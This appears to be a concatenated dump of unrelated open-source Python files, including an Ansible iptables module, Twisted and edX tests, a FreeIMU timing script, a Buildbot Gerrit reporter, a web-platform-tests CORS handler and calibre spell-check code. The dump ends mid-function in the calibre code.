cmd = push_arguments(iptables_path, '-D', params)
module.run_command(cmd, check_rc=True)
def main():
module = AnsibleModule(
supports_check_mode=True,
argument_spec=dict(
table=dict(required=False, default='filter', choices=['filter', 'nat', 'mangle', 'raw', 'security']),
state=dict(required=False, default='present', choices=['present', 'absent']),
ip_version=dict(required=False, default='ipv4', choices=['ipv4', 'ipv6']),
chain=dict(required=True, default=None, type='str'),
protocol=dict(required=False, default=None, type='str'),
source=dict(required=False, default=None, type='str'),
destination=dict(required=False, default=None, type='str'),
to_destination=dict(required=False, default=None, type='str'),
match=dict(required=False, default=[], type='list'),
jump=dict(required=False, default=None, type='str'),
goto=dict(required=False, default=None, type='str'),
in_interface=dict(required=False, default=None, type='str'),
out_interface=dict(required=False, default=None, type='str'),
fragment=dict(required=False, default=None, type='str'),
set_counters=dict(required=False, default=None, type='str'),
source_port=dict(required=False, default=None, type='str'),
destination_port=dict(required=False, default=None, type='str'),
to_ports=dict(required=False, default=None, type='str'),
set_dscp_mark=dict(required=False,default=None, type='str'),
set_dscp_mark_class=dict(required=False,default=None, type='str'),
comment=dict(required=False, default=None, type='str'),
ctstate=dict(required=False, default=[], type='list'),
limit=dict(required=False, default=None, type='str'),
limit_burst=dict(required=False, default=None, type='str'),
uid_owner=dict(required=False, default=None, type='str'),
reject_with=dict(required=False, default=None, type='str'),
),
mutually_exclusive=(
['set_dscp_mark', 'set_dscp_mark_class'],
),
)
args = dict(
changed=False,
failed=False,
ip_version=module.params['ip_version'],
table=module.params['table'],
chain=module.params['chain'],
rule=' '.join(construct_rule(module.params)),
state=module.params['state'],
)
ip_version = module.params['ip_version']
iptables_path = module.get_bin_path(BINS[ip_version], True)
rule_is_present = check_present(iptables_path, module, module.params)
should_be_present = (args['state'] == 'present')
# Check if target is up to date
args['changed'] = (rule_is_present != should_be_present)
# Check only; don't modify
if module.check_mode:
module.exit_json(changed=args['changed'])
# Target is already up to date
if args['changed'] == False:
module.exit_json(**args)
if should_be_present:
append_rule(iptables_path, module, module.params)
else:
remove_rule(iptables_path, module, module.params)
module.exit_json(**args)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
louietsai/python-for-android
|
refs/heads/master
|
python-modules/twisted/twisted/internet/test/inlinecb_tests.py
|
59
|
# -*- test-case-name: twisted.internet.test.test_inlinecb -*-
# Copyright (c) 2009-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.internet.defer.inlineCallbacks}.
These tests are defined in a non-C{test_*} module because they are
syntactically invalid on python < 2.5. test_inlinecb will conditionally import
these tests on python 2.5 and greater.
Some tests for inlineCallbacks are defined in L{twisted.test.test_defgen} as
well: see U{http://twistedmatrix.com/trac/ticket/4182}.
"""
from twisted.trial.unittest import TestCase
from twisted.internet.defer import Deferred, returnValue, inlineCallbacks
class NonLocalExitTests(TestCase):
"""
It's possible for L{returnValue} to be (accidentally) invoked at a stack
level below the L{inlineCallbacks}-decorated function which it is exiting.
If this happens, L{returnValue} should report useful errors.
If L{returnValue} is invoked from a function not decorated by
L{inlineCallbacks}, it will emit a warning if it causes an
L{inlineCallbacks} function further up the stack to exit.
"""
def mistakenMethod(self):
"""
This method mistakenly invokes L{returnValue}, despite the fact that it
is not decorated with L{inlineCallbacks}.
"""
returnValue(1)
def assertMistakenMethodWarning(self, resultList):
"""
Flush the current warnings and assert that we have been told that
C{mistakenMethod} was invoked, and that the result from the Deferred
that was fired (appended to the given list) is C{mistakenMethod}'s
result. The warning should indicate that an inlineCallbacks function
called 'inline' was made to exit.
"""
self.assertEqual(resultList, [1])
warnings = self.flushWarnings(offendingFunctions=[self.mistakenMethod])
self.assertEqual(len(warnings), 1)
self.assertEquals(warnings[0]['category'], DeprecationWarning)
self.assertEquals(
warnings[0]['message'],
"returnValue() in 'mistakenMethod' causing 'inline' to exit: "
"returnValue should only be invoked by functions decorated with "
"inlineCallbacks")
def test_returnValueNonLocalWarning(self):
"""
L{returnValue} will emit a non-local exit warning in the simplest case,
where the offending function is invoked immediately.
"""
@inlineCallbacks
def inline():
self.mistakenMethod()
returnValue(2)
yield 0
d = inline()
results = []
d.addCallback(results.append)
self.assertMistakenMethodWarning(results)
def test_returnValueNonLocalDeferred(self):
"""
L{returnValue} will emit a non-local warning in the case where the
L{inlineCallbacks}-decorated function has already yielded a Deferred
and therefore moved its generator function along.
"""
cause = Deferred()
@inlineCallbacks
def inline():
yield cause
self.mistakenMethod()
returnValue(2)
effect = inline()
results = []
effect.addCallback(results.append)
self.assertEquals(results, [])
cause.callback(1)
self.assertMistakenMethodWarning(results)
|
ScifestJoensuu/theater-robot
|
refs/heads/master
|
Arduino/libraries/FreeIMU/debug/timing.py
|
21
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
time.py - Tests the output coming from an Arduino with FreeIMU for speed.
Load the Arduino with the FreeIMU_serial program.
Copyright (C) 2012 Fabio Varesano <fvaresano@yahoo.it>
Development of this code has been supported by the Department of Computer Science,
Universita' degli Studi di Torino, Italy within the Piemonte Project
http://www.piemonte.di.unito.it/
This program is free software: you can redistribute it and/or modify
it under the terms of the version 3 GNU General Public License as
published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import time
import serial
from struct import unpack
from binascii import unhexlify
from subprocess import call
print "\n\nWelcome to the FreeIMU timer routine!\nCopyright © Fabio Varesano 2012.\nReleased under GPL v3 - See http://www.gnu.org/copyleft/gpl.html\n\n"
print "Please load the FreeIMU_serial program from the FreeIMU library examples on your Arduino. Once you correctly installed the FreeIMU library, the examples are available from File->Examples->FreeIMU in the Arduino IDE.\nWhen done, close the Arduino IDE and its serial monitor."
raw_input('Hit Enter to continue.')
arduino_port = raw_input('Insert the serial port which connects to the Arduino (See in the Arduino IDE Tools->Serial Port if in doubt): ')
# instantiate a serial port object. port gets opened by default, no need to explicitly open it.
ser = serial.Serial(
port= arduino_port,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
if ser.isOpen():
print "Arduino serial port opened correctly"
# we rely on the unhandled serial exception which will stop the program in case of problems during serial opening
ser.write('v') # ask version
print "\nFreeIMU library version informations:",
print ser.readline()
print "\nThe program will now start sampling debugging values and timing them.\n"
raw_input('Hit Enter to continue.')
buff = [0.0 for i in range(9)]
start = time.time()
tot_readings = 0
try:
print "Sampling from FreeIMU and timing readings"
while True:
ser.readline()
ser.readline()
ser.readline()
tot_readings = tot_readings + 1
if(tot_readings % 100 == 0):
tot_time = time.time() - start
print "%d readings obtained. Frequency %f over %d seconds. Hit CTRL+C to interrupt." % (tot_readings, tot_readings / tot_time, tot_time)
except KeyboardInterrupt:
ser.close()
|
jonathan-beard/edx-platform
|
refs/heads/master
|
lms/tests.py
|
54
|
"""Tests for the lms module itself."""
import mimetypes
from mock import patch
from django.test import TestCase
from django.core.urlresolvers import reverse
from edxmako import add_lookup, LOOKUP
from lms import startup
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
class LmsModuleTests(TestCase):
"""
Tests for lms module itself.
"""
def test_new_mimetypes(self):
extensions = ['eot', 'otf', 'ttf', 'woff']
for extension in extensions:
mimetype, _ = mimetypes.guess_type('test.' + extension)
self.assertIsNotNone(mimetype)
class TemplateLookupTests(TestCase):
"""
Tests for TemplateLookup.
"""
def test_add_lookup_to_main(self):
"""Test that any template directories added are not cleared when microsites are enabled."""
add_lookup('main', 'external_module', __name__)
directories = LOOKUP['main'].directories
self.assertEqual(len([dir for dir in directories if 'external_module' in dir]), 1)
# This should not clear the directories list
startup.enable_microsites()
directories = LOOKUP['main'].directories
self.assertEqual(len([dir for dir in directories if 'external_module' in dir]), 1)
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_FEEDBACK_SUBMISSION': True})
class HelpModalTests(ModuleStoreTestCase):
"""Tests for the help modal"""
def setUp(self):
super(HelpModalTests, self).setUp()
self.course = CourseFactory.create()
def test_simple_test(self):
"""
Simple test to make sure that you don't get a 500 error when the modal
is enabled.
"""
url = reverse('info', args=[self.course.id.to_deprecated_string()])
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
|
rodrigc/buildbot
|
refs/heads/master
|
master/buildbot/reporters/gerrit.py
|
2
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
"""
Push events to Gerrit
"""
import time
import warnings
from pkg_resources import parse_version
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ProcessProtocol
from twisted.python import log
from buildbot.process.results import EXCEPTION
from buildbot.process.results import FAILURE
from buildbot.process.results import RETRY
from buildbot.process.results import SUCCESS
from buildbot.process.results import WARNINGS
from buildbot.process.results import Results
from buildbot.reporters import utils
from buildbot.util import bytes2unicode
from buildbot.util import service
# Cache the version that the gerrit server is running for this many seconds
GERRIT_VERSION_CACHE_TIMEOUT = 600
GERRIT_LABEL_VERIFIED = 'Verified'
GERRIT_LABEL_REVIEWED = 'Code-Review'
def makeReviewResult(message, *labels):
"""
helper to produce a review result
"""
return dict(message=message, labels=dict(labels))
def _handleLegacyResult(result):
"""
make sure the result is backward compatible
"""
if not isinstance(result, dict):
warnings.warn('The Gerrit status callback uses the old way to '
'communicate results. The outcome might be not what is '
'expected.')
message, verified, reviewed = result
result = makeReviewResult(message,
(GERRIT_LABEL_VERIFIED, verified),
(GERRIT_LABEL_REVIEWED, reviewed))
return result
def _old_add_label(label, value):
if label == GERRIT_LABEL_VERIFIED:
return ["--verified %d" % int(value)]
elif label == GERRIT_LABEL_REVIEWED:
return ["--code-review %d" % int(value)]
warnings.warn(('Gerrit older than 2.6 does not support custom labels. '
'Setting {} is ignored.').format(label))
return []
def _new_add_label(label, value):
return ["--label {}={}".format(label, int(value))]
def defaultReviewCB(builderName, build, result, master, arg):
if result == RETRY:
return makeReviewResult(None)
message = "Buildbot finished compiling your patchset\n"
message += "on configuration: {}\n".format(builderName)
message += "The result is: {}\n".format(Results[result].upper())
return makeReviewResult(message,
(GERRIT_LABEL_VERIFIED, result == SUCCESS or -1))
def defaultSummaryCB(buildInfoList, results, master, arg):
success = False
failure = False
msgs = []
for buildInfo in buildInfoList:
msg = "Builder %(name)s %(resultText)s (%(text)s)" % buildInfo
link = buildInfo.get('url', None)
if link:
msg += " - " + link
else:
msg += "."
msgs.append(msg)
if buildInfo['result'] == SUCCESS: # pylint: disable=simplifiable-if-statement
success = True
else:
failure = True
if success and not failure:
verified = 1
else:
verified = -1
return makeReviewResult('\n\n'.join(msgs), (GERRIT_LABEL_VERIFIED, verified))
# These are just sentinel values for GerritStatusPush.__init__ args
class DEFAULT_REVIEW:
pass
class DEFAULT_SUMMARY:
pass
class GerritStatusPush(service.BuildbotService):
"""Event streamer to a gerrit ssh server."""
name = "GerritStatusPush"
gerrit_server = None
gerrit_username = None
gerrit_port = None
gerrit_version_time = None
gerrit_version = None
gerrit_identity_file = None
reviewCB = None
reviewArg = None
startCB = None
startArg = None
summaryCB = None
summaryArg = None
wantSteps = False
wantLogs = False
_gerrit_notify = None
def reconfigService(self, server, username, reviewCB=DEFAULT_REVIEW,
startCB=None, port=29418, reviewArg=None,
startArg=None, summaryCB=DEFAULT_SUMMARY, summaryArg=None,
identity_file=None, builders=None, notify=None,
wantSteps=False, wantLogs=False):
# If neither reviewCB nor summaryCB were specified, default to sending
# out "summary" reviews. But if we were given a reviewCB and only a
# reviewCB, disable the "summary" reviews, so we don't send out both
# by default.
if reviewCB is DEFAULT_REVIEW and summaryCB is DEFAULT_SUMMARY:
reviewCB = None
summaryCB = defaultSummaryCB
if reviewCB is DEFAULT_REVIEW:
reviewCB = None
if summaryCB is DEFAULT_SUMMARY:
summaryCB = None
# Parameters.
self.gerrit_server = server
self.gerrit_username = username
self.gerrit_port = port
self.gerrit_version = None
self.gerrit_version_time = 0
self.gerrit_identity_file = identity_file
self.reviewCB = reviewCB
self.reviewArg = reviewArg
self.startCB = startCB
self.startArg = startArg
self.summaryCB = summaryCB
self.summaryArg = summaryArg
self.builders = builders
self._gerrit_notify = notify
self.wantSteps = wantSteps
self.wantLogs = wantLogs
def _gerritCmd(self, *args):
'''Construct a command as a list of strings suitable for
:func:`subprocess.call`.
'''
if self.gerrit_identity_file is not None:
options = ['-i', self.gerrit_identity_file]
else:
options = []
return ['ssh'] + options + [
'@'.join((self.gerrit_username, self.gerrit_server)),
'-p', str(self.gerrit_port),
'gerrit'
] + list(args)
class VersionPP(ProcessProtocol):
def __init__(self, func):
self.func = func
self.gerrit_version = None
def outReceived(self, data):
vstr = b"gerrit version "
if not data.startswith(vstr):
log.msg(b"Error: Cannot interpret gerrit version info: " + data)
return
vers = data[len(vstr):].strip()
log.msg(b"gerrit version: " + vers)
self.gerrit_version = parse_version(bytes2unicode(vers))
def errReceived(self, data):
log.msg(b"gerriterr: " + data)
def processEnded(self, status_object):
if status_object.value.exitCode:
log.msg("gerrit version status: ERROR:", status_object)
return
if self.gerrit_version:
self.func(self.gerrit_version)
def getCachedVersion(self):
if self.gerrit_version is None:
return None
if time.time() - self.gerrit_version_time > GERRIT_VERSION_CACHE_TIMEOUT:
# cached version has expired
self.gerrit_version = None
return self.gerrit_version
def processVersion(self, gerrit_version, func):
self.gerrit_version = gerrit_version
self.gerrit_version_time = time.time()
func()
def callWithVersion(self, func):
command = self._gerritCmd("version")
def callback(gerrit_version):
return self.processVersion(gerrit_version, func)
self.spawnProcess(self.VersionPP(callback), command[0], command, env=None)
class LocalPP(ProcessProtocol):
def __init__(self, status):
self.status = status
def outReceived(self, data):
log.msg("gerritout:", data)
def errReceived(self, data):
log.msg("gerriterr:", data)
def processEnded(self, status_object):
if status_object.value.exitCode:
log.msg("gerrit status: ERROR:", status_object)
else:
log.msg("gerrit status: OK")
@defer.inlineCallbacks
def startService(self):
yield super().startService()
startConsuming = self.master.mq.startConsuming
self._buildsetCompleteConsumer = yield startConsuming(
self.buildsetComplete,
('buildsets', None, 'complete'))
self._buildCompleteConsumer = yield startConsuming(
self.buildComplete,
('builds', None, 'finished'))
self._buildStartedConsumer = yield startConsuming(
self.buildStarted,
('builds', None, 'new'))
def stopService(self):
self._buildsetCompleteConsumer.stopConsuming()
self._buildCompleteConsumer.stopConsuming()
self._buildStartedConsumer.stopConsuming()
@defer.inlineCallbacks
def _got_event(self, key, msg):
# This function is used only from tests
if key[0] == 'builds':
if key[2] == 'new':
yield self.buildStarted(key, msg)
return
elif key[2] == 'finished':
yield self.buildComplete(key, msg)
return
if key[0] == 'buildsets' and key[2] == 'complete': # pragma: no cover
yield self.buildsetComplete(key, msg)
return
raise Exception('Invalid key for _got_event: {}'.format(key)) # pragma: no cover
@defer.inlineCallbacks
def buildStarted(self, key, build):
if self.startCB is None:
return
yield self.getBuildDetails(build)
if self.isBuildReported(build):
result = yield self.startCB(build['builder']['name'], build, self.startArg)
self.sendCodeReviews(build, result)
@defer.inlineCallbacks
def buildComplete(self, key, build):
if self.reviewCB is None:
return
yield self.getBuildDetails(build)
if self.isBuildReported(build):
result = yield self.reviewCB(build['builder']['name'], build, build['results'],
self.master, self.reviewArg)
result = _handleLegacyResult(result)
self.sendCodeReviews(build, result)
@defer.inlineCallbacks
def getBuildDetails(self, build):
br = yield self.master.data.get(("buildrequests", build['buildrequestid']))
buildset = yield self.master.data.get(("buildsets", br['buildsetid']))
yield utils.getDetailsForBuilds(self.master,
buildset,
[build],
wantProperties=True,
wantSteps=self.wantSteps)
def isBuildReported(self, build):
return self.builders is None or build['builder']['name'] in self.builders
@defer.inlineCallbacks
def buildsetComplete(self, key, msg):
if not self.summaryCB:
return
bsid = msg['bsid']
res = yield utils.getDetailsForBuildset(
self.master, bsid, wantProperties=True,
wantSteps=self.wantSteps, wantLogs=self.wantLogs)
builds = res['builds']
buildset = res['buildset']
self.sendBuildSetSummary(buildset, builds)
@defer.inlineCallbacks
def sendBuildSetSummary(self, buildset, builds):
builds = [build for build in builds if self.isBuildReported(build)]
if builds and self.summaryCB:
def getBuildInfo(build):
result = build['results']
resultText = {
SUCCESS: "succeeded",
FAILURE: "failed",
WARNINGS: "completed with warnings",
EXCEPTION: "encountered an exception",
}.get(result, "completed with unknown result %d" % result)
return {'name': build['builder']['name'],
'result': result,
'resultText': resultText,
'text': build['state_string'],
'url': utils.getURLForBuild(self.master, build['builder']['builderid'],
build['number']),
'build': build
}
buildInfoList = sorted(
[getBuildInfo(build) for build in builds], key=lambda bi: bi['name'])
result = yield self.summaryCB(buildInfoList,
Results[buildset['results']],
self.master,
self.summaryArg)
result = _handleLegacyResult(result)
self.sendCodeReviews(builds[0], result)
def sendCodeReviews(self, build, result):
message = result.get('message', None)
if message is None:
return
def getProperty(build, name):
return build['properties'].get(name, [None])[0]
# Gerrit + Repo
downloads = getProperty(build, "repo_downloads")
downloaded = getProperty(build, "repo_downloaded")
if downloads is not None and downloaded is not None:
downloaded = downloaded.split(" ")
if downloads and 2 * len(downloads) == len(downloaded):
for i, download in enumerate(downloads):
try:
project, change1 = download.split(" ")
except ValueError:
return # something is wrong, abort
change2 = downloaded[2 * i]
revision = downloaded[2 * i + 1]
if change1 == change2:
self.sendCodeReview(project, revision, result)
else:
return # something is wrong, abort
return
# Gerrit + Git
# used only to verify Gerrit source
if getProperty(build, "event.change.id") is not None:
project = getProperty(build, "event.change.project")
codebase = getProperty(build, "codebase")
revision = (getProperty(build, "event.patchSet.revision") or
getProperty(build, "got_revision") or
getProperty(build, "revision"))
if isinstance(revision, dict):
# in case of the revision is a codebase revision, we just take
# the revisionfor current codebase
if codebase is not None:
revision = revision[codebase]
else:
revision = None
if project is not None and revision is not None:
self.sendCodeReview(project, revision, result)
return
def sendCodeReview(self, project, revision, result):
gerrit_version = self.getCachedVersion()
if gerrit_version is None:
self.callWithVersion(
lambda: self.sendCodeReview(project, revision, result))
return
assert gerrit_version
command = self._gerritCmd("review", "--project {}".format(project))
if gerrit_version >= parse_version("2.13"):
command.append('--tag autogenerated:buildbot')
if self._gerrit_notify is not None:
command.append('--notify {}'.format(str(self._gerrit_notify)))
message = result.get('message', None)
if message:
command.append("--message '{}'".format(message.replace("'", "\"")))
labels = result.get('labels', None)
if labels:
if gerrit_version < parse_version("2.6"):
add_label = _old_add_label
else:
add_label = _new_add_label
for label, value in labels.items():
command.extend(add_label(label, value))
command.append(revision)
command = [str(s) for s in command]
self.spawnProcess(self.LocalPP(self), command[0], command, env=None)
def spawnProcess(self, *arg, **kw):
reactor.spawnProcess(*arg, **kw)
|
alingse/httpdec
|
refs/heads/master
|
httpdec/main.py
|
1
|
# coding=utf-8
from .decode import decode
import click
from StringIO import StringIO
import pyperclip
import sys
stdin = sys.stdin
stdout = sys.stdout
typed = dict(
h='header',
c='cookie')
types = typed.keys() + typed.values()
def fake_clip():
content = pyperclip.paste()
fin = StringIO(content)
fout = StringIO()
def close():
value = fout.getvalue()
pyperclip.copy(value)
fout.close = close
return fin, fout
def fake_raw(content):
fin = StringIO(content)
return fin
@click.command()
@click.option('-d', '--type', type=click.Choice(types), help='decode type')
@click.option('-p', '--clip', is_flag=True, help='read/write to clipboard')
@click.option('--raw', type=unicode, help='raw input string', default=None)
@click.argument('input', type=click.File('r'), default=stdin)
@click.argument('output', type=click.File('w'), default=stdout)
def httpdec(output, input, raw, clip, type):
"""
httpdec [OPTIONS] [INPUT] [OUTPUT]
INPUT: the source file, default is stdin
OUTPUT: the output file, default is stdout
"""
if clip:
input, output = fake_clip()
if raw is not None:
input = fake_raw(raw)
type = typed[type[0]]
decode(input, output, type)
input.close()
output.close()
|
rapilabs/django
|
refs/heads/master
|
django/contrib/postgres/aggregates/__init__.py
|
625
|
from .general import * # NOQA
from .statistics import * # NOQA
|
mohammed-alfatih/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/XMLHttpRequest/resources/auth2/corsenabled.py
|
367
|
import imp
import os
def main(request, response):
response.headers.set('Access-Control-Allow-Origin', request.headers.get("origin"));
response.headers.set('Access-Control-Allow-Credentials', 'true');
response.headers.set('Access-Control-Allow-Methods', 'GET');
response.headers.set('Access-Control-Allow-Headers', 'authorization, x-user, x-pass');
response.headers.set('Access-Control-Expose-Headers', 'x-challenge, xhr-user, ses-user');
auth = imp.load_source("", os.path.join(os.path.abspath(os.curdir),
"XMLHttpRequest",
"resources",
"authentication.py"))
if request.method == "OPTIONS":
return ""
else:
return auth.main(request, response)
|
ns950/calibre
|
refs/heads/master
|
src/calibre/spell/dictionary.py
|
3
|
#!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
import os, glob, shutil, re, sys
from collections import namedtuple, defaultdict
from operator import attrgetter
from itertools import chain
from functools import partial
from calibre import prints
from calibre.constants import plugins, config_dir
from calibre.spell import parse_lang_code
from calibre.utils.config import JSONConfig
from calibre.utils.icu import capitalize
from calibre.utils.localization import get_lang, get_system_locale
Dictionary = namedtuple('Dictionary', 'primary_locale locales dicpath affpath builtin name id')
LoadedDictionary = namedtuple('Dictionary', 'primary_locale locales obj builtin name id')
hunspell = plugins['hunspell'][0]
if hunspell is None:
raise RuntimeError('Failed to load hunspell: %s' % plugins['hunspell'][1])
dprefs = JSONConfig('dictionaries/prefs.json')
dprefs.defaults['preferred_dictionaries'] = {}
dprefs.defaults['preferred_locales'] = {}
dprefs.defaults['user_dictionaries'] = [{'name':_('Default'), 'is_active':True, 'words':[]}]
not_present = object()
class UserDictionary(object):
__slots__ = ('name', 'is_active', 'words')
def __init__(self, **kwargs):
self.name = kwargs['name']
self.is_active = kwargs['is_active']
self.words = {(w, langcode) for w, langcode in kwargs['words']}
def serialize(self):
return {'name':self.name, 'is_active': self.is_active, 'words':[
(w, l) for w, l in self.words]}
_builtins = _custom = None
def builtin_dictionaries():
global _builtins
if _builtins is None:
dics = []
for lc in glob.glob(os.path.join(P('dictionaries', allow_user_override=False), '*/locales')):
locales = filter(None, open(lc, 'rb').read().decode('utf-8').splitlines())
locale = locales[0]
base = os.path.dirname(lc)
dics.append(Dictionary(
parse_lang_code(locale), frozenset(map(parse_lang_code, locales)), os.path.join(base, '%s.dic' % locale),
os.path.join(base, '%s.aff' % locale), True, None, None))
_builtins = frozenset(dics)
return _builtins
def custom_dictionaries(reread=False):
global _custom
if _custom is None or reread:
dics = []
for lc in glob.glob(os.path.join(config_dir, 'dictionaries', '*/locales')):
locales = filter(None, open(lc, 'rb').read().decode('utf-8').splitlines())
try:
name, locale, locales = locales[0], locales[1], locales[1:]
except IndexError:
continue
base = os.path.dirname(lc)
ploc = parse_lang_code(locale)
if ploc.countrycode is None:
continue
dics.append(Dictionary(
ploc, frozenset(filter(lambda x:x.countrycode is not None, map(parse_lang_code, locales))), os.path.join(base, '%s.dic' % locale),
os.path.join(base, '%s.aff' % locale), False, name, os.path.basename(base)))
_custom = frozenset(dics)
return _custom
default_en_locale = 'en-US'
try:
ul = parse_lang_code(get_system_locale() or 'en-US')
except ValueError:
ul = None
if ul is not None and ul.langcode == 'eng' and ul.countrycode in 'GB BS BZ GH IE IN JM NZ TT'.split():
default_en_locale = 'en-' + ul.countrycode
default_preferred_locales = {'eng':default_en_locale, 'deu':'de-DE', 'spa':'es-ES', 'fra':'fr-FR'}
def best_locale_for_language(langcode):
best_locale = dprefs['preferred_locales'].get(langcode, default_preferred_locales.get(langcode, None))
if best_locale is not None:
return parse_lang_code(best_locale)
def preferred_dictionary(locale):
return {parse_lang_code(k):v for k, v in dprefs['preferred_dictionaries'].iteritems()}.get(locale, None)
def remove_dictionary(dictionary):
if dictionary.builtin:
raise ValueError('Cannot remove builtin dictionaries')
base = os.path.dirname(dictionary.dicpath)
shutil.rmtree(base)
dprefs['preferred_dictionaries'] = {k:v for k, v in dprefs['preferred_dictionaries'].iteritems() if v != dictionary.id}
def rename_dictionary(dictionary, name):
lf = os.path.join(os.path.dirname(dictionary.dicpath), 'locales')
with open(lf, 'r+b') as f:
lines = f.read().splitlines()
lines[:1] = [name.encode('utf-8')]
f.seek(0), f.truncate(), f.write(b'\n'.join(lines))
custom_dictionaries(reread=True)
def get_dictionary(locale, exact_match=False):
preferred = preferred_dictionary(locale)
# First find all dictionaries that match locale exactly
exact_matches = {}
for collection in (custom_dictionaries(), builtin_dictionaries()):
for d in collection:
if d.primary_locale == locale:
exact_matches[d.id] = d
for d in collection:
for q in d.locales:
if q == locale and d.id not in exact_matches:
exact_matches[d.id] = d
# If the user has specified a preferred dictionary for this locale, use it,
# otherwise, if a builtin dictionary exists, use that
if preferred in exact_matches:
return exact_matches[preferred]
# Return one of the exactly matching dictionaries, preferring user
# installed to builtin ones
for k in sorted(exact_matches, key=lambda x: (1, None) if x is None else (0, x)):
return exact_matches[k]
if exact_match:
return
# No dictionary matched the locale exactly, we will now fallback to
# matching only on language. First see if a dictionary matching the
# preferred locale for the language exists.
best_locale = best_locale_for_language(locale.langcode)
if best_locale is not None:
ans = get_dictionary(best_locale, exact_match=True)
if ans is not None:
return ans
# Now just return any dictionary that matches the language, preferring user
# installed ones to builtin ones
for collection in (custom_dictionaries(), builtin_dictionaries()):
for d in sorted(collection, key=attrgetter('name')):
if d.primary_locale.langcode == locale.langcode:
return d
def load_dictionary(dictionary):
from calibre.spell.import_from import convert_to_utf8
with open(dictionary.dicpath, 'rb') as dic, open(dictionary.affpath, 'rb') as aff:
dic_data, aff_data = dic.read(), aff.read()
dic_data, aff_data = convert_to_utf8(dic_data, aff_data)
obj = hunspell.Dictionary(dic_data, aff_data)
return LoadedDictionary(dictionary.primary_locale, dictionary.locales, obj, dictionary.builtin, dictionary.name, dictionary.id)
class Dictionaries(object):
def __init__(self):
self.remove_hyphenation = re.compile('[\u2010-]+')
self.negative_pat = re.compile('-[.\d+]')
self.fix_punctuation_pat = re.compile(r'''[:.]''')
self.dictionaries = {}
self.word_cache = {}
self.ignored_words = set()
self.added_user_words = {}
try:
self.default_locale = parse_lang_code(get_lang())
except ValueError:
self.default_locale = parse_lang_code('en-US')
self.ui_locale = self.default_locale
def initialize(self, force=False):
if force or not hasattr(self, 'active_user_dictionaries'):
self.read_user_dictionaries()
def clear_caches(self):
self.dictionaries.clear(), self.word_cache.clear()
def clear_ignored(self):
self.ignored_words.clear()
def dictionary_for_locale(self, locale):
ans = self.dictionaries.get(locale, not_present)
if ans is not_present:
ans = get_dictionary(locale)
if ans is not None:
ans = load_dictionary(ans)
for ud in self.active_user_dictionaries:
for word, langcode in ud.words:
if langcode == locale.langcode:
try:
ans.obj.add(word)
except Exception:
# not critical since all it means is that the word wont show up in suggestions
prints('Failed to add the word %r to the dictionary for %s' % (word, locale), file=sys.stderr)
self.dictionaries[locale] = ans
return ans
def ignore_word(self, word, locale):
self.ignored_words.add((word, locale.langcode))
self.word_cache[(word, locale)] = True
def unignore_word(self, word, locale):
self.ignored_words.discard((word, locale.langcode))
self.word_cache.pop((word, locale), None)
def is_word_ignored(self, word, locale):
return (word, locale.langcode) in self.ignored_words
@property
def all_user_dictionaries(self):
return chain(self.active_user_dictionaries, self.inactive_user_dictionaries)
def user_dictionary(self, name):
for ud in self.all_user_dictionaries:
if ud.name == name:
return ud
def read_user_dictionaries(self):
self.active_user_dictionaries = []
self.inactive_user_dictionaries = []
for d in dprefs['user_dictionaries'] or dprefs.defaults['user_dictionaries']:
d = UserDictionary(**d)
(self.active_user_dictionaries if d.is_active else self.inactive_user_dictionaries).append(d)
def mark_user_dictionary_as_active(self, name, is_active=True):
d = self.user_dictionary(name)
if d is not None:
d.is_active = is_active
self.save_user_dictionaries()
return True
return False
def save_user_dictionaries(self):
dprefs['user_dictionaries'] = [d.serialize() for d in self.all_user_dictionaries]
def add_user_words(self, words, langcode):
for d in self.dictionaries.itervalues():
if d and getattr(d.primary_locale, 'langcode', None) == langcode:
for word in words:
d.obj.add(word)
def remove_user_words(self, words, langcode):
for d in self.dictionaries.itervalues():
if d and d.primary_locale.langcode == langcode:
for word in words:
d.obj.remove(word)
def add_to_user_dictionary(self, name, word, locale):
ud = self.user_dictionary(name)
if ud is None:
raise ValueError('Cannot add to the dictionary named: %s as no such dictionary exists' % name)
wl = len(ud.words)
if isinstance(word, (set, frozenset)):
ud.words |= word
self.add_user_words(word, locale.langcode)
else:
ud.words.add((word, locale.langcode))
self.add_user_words((word,), locale.langcode)
if len(ud.words) > wl:
self.save_user_dictionaries()
try:
self.word_cache.pop((word, locale), None)
except TypeError:
pass # word is a set, ignore
return True
return False
def remove_from_user_dictionaries(self, word, locale):
key = (word, locale.langcode)
changed = False
for ud in self.active_user_dictionaries:
if key in ud.words:
changed = True
ud.words.discard(key)
if changed:
self.word_cache.pop((word, locale), None)
self.save_user_dictionaries()
self.remove_user_words((word,), locale.langcode)
return changed
def remove_from_user_dictionary(self, name, words):
changed = False
removals = defaultdict(set)
keys = [(w, l.langcode) for w, l in words]
for d in self.all_user_dictionaries:
if d.name == name:
for key in keys:
if key in d.words:
d.words.discard(key)
removals[key[1]].add(key[0])
changed = True
if changed:
for key in words:
